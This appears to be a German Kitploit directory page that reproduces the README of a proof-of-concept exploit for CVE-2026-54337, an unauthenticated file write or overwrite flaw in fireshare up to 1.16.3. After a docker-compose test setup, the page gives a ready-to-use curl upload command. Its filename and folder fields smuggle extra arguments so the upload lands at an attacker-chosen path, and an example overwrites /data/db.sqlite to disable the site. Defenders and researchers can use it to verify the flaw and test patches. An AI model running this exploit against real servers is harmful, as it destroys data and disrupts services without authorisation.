Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-54337-PoC — CVE-2026-54337 - Proof-of-Concept für Datei-Schreib-/-Überschreiben ohne Authentifizierung für fireshare <= 1.16.3 | Kitploit
Tools/GitHubGitHub/4qu4r1um/cve-2026-54337-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationCTFPenetrationstestsLernen & Bildung
GitHub4qu4r1um/cve-2026-54337-poc

CVE-2026-54337-PoC

CVE-2026-54337 - Proof-of-Concept für Datei-Schreib-/-Überschreiben ohne Authentifizierung für fireshare <= 1.16.3

Repository anzeigen
vor 2 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-54337 PoC

CVE-2026-54337 - Unauthenticated Datei-Schreiben/Überschreiben in fireshare <= 1.16.3 PoC

Weitere Informationen finden Sie in diesem GitHub Advisory

Einrichtung

  • Bitte verwenden Sie die folgende docker-compose.yml zum Testen
root@kitploit:~
services:
  fireshare:
    container_name: fireshare-temp
    image: shaneisrael/fireshare:1.6.13-lite

    ports:
      - "8082:80"

    # Ephemeral storage (discarded when container stops)
    tmpfs:
      - /data
      - /processed
      - /videos
      - /images

    environment:
      - ADMIN_USERNAME=admin
      - ADMIN_PASSWORD=admin123
      - SECRET_KEY=fireshare-super-secret-random-key
      - DOMAIN=
      - PUID=1000
      - PGID=1000

    restart: unless-stopped

Exploit

  • Schritt 1: Erstellen Sie eine beliebige Datei, solange Sie sie mit der Erweiterung .mp4 benennen, zum Beispiel
root@kitploit:~
$ echo 123 > test.mp4
  • Schritt 2: Führen Sie den folgenden curl-Befehl aus (stellen Sie sicher, dass Sie den Platzhalter ändern)
root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=<FILE TO OVERWRITE/WRITE> -select_streams v.mp4" \
  -F "folder=testfolder -o <DIRECTORY TO PUT THE FILE>" \
  http://<URL>/api/upload/public

Um beispielsweise /data/db.sqlite zu überschreiben, ändern Sie den Befehl wie folgt:

root@kitploit:~
$ curl -s -w "HTTP %{http_code}\n" \
  -F "file=@<FILEPATH>;filename=db.sqlite -select_streams v.mp4" \
  -F "folder=testfolder -o data" \
  http://<URL>/api/upload/public

Hinweis

  • Da der Dienst standardmäßig unter dem Benutzer nginx läuft, der nur Zugriff auf /data, /processed, /images und /videos hat, können Sie dort nur schreiben/überschreiben.
  • Aus diesem Grund hat meiner Meinung nach das Überschreiben von /data/db.sqlite die größte Auswirkung, da es die Website unbrauchbar macht.

Haftungsausschluss

  • Dieses Proof-of-Concept (PoC) wird nur zu Bildungs-, Forschungs- und defensiven Sicherheitszwecken bereitgestellt.
  • Der Autor übernimmt keine Verantwortung für Missbrauch, Schäden, unbefugten Zugriff, Dienstunterbrechungen, Datenverlust oder rechtliche Konsequenzen, die aus der Nutzung dieses Codes resultieren. Die Nutzer sind allein dafür verantwortlich, sicherzustellen, dass sie vor der Verwendung dieses PoC alle geltenden Gesetze, Vorschriften und Autorisierungsanforderungen einhalten.
  • Dieses PoC sollte nur gegen Systeme ausgeführt werden, für die Sie eine ausdrückliche Erlaubnis zum Testen haben. Nicht autorisiertes Testen von Systemen kann illegal und unethisch sein.
  • Durch die Nutzung dieser Software erkennen Sie an, dass Sie dies auf eigenes Risiko tun.
Tool herunterladen